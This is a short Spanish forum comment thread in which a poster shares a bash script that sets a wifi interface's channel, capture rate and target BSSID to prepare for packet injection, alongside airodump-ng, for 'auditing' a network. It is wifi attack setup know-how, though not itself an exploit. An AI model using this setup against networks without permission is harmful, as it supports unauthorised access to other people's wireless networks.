@Pato: Tu problema se debe quizas a la forma que esta escrito el script, yo lo volvi a escribir y no se si sea igual, pero yo lo puse así y lo llame trafico.sh, el canal es el de la red que deseas auditar que puedes ver con el comando sudo airodump-ng rtap0, el fichero pon cualquier nombre ese se crea. Asi es mi Script:
#!/bin/bash
clear
echo “Please provide the wifi0 CHANNEL”
read canal
echo “Please provide the capture rate (best results with only 2)”
read rate
echo “Please provide the target BSSID”
read bssid
ifconfig wifi0 down
chmod u+wrx /sys/class/net/wifi0/device/rate
echo $rate >/sys/class/net/wifi0/device/rate
echo $canal >/sys/class/net/wifi0/device/channel
echo $bssid >/sys/class/net/wifi0/device/bssid
ifconfig wifi0 up
echo “Configuration completed. Ready to do packet injection”
@Gustavo: Tus problemas quizas se deban a que no elijas correctamente el canal con tu Script.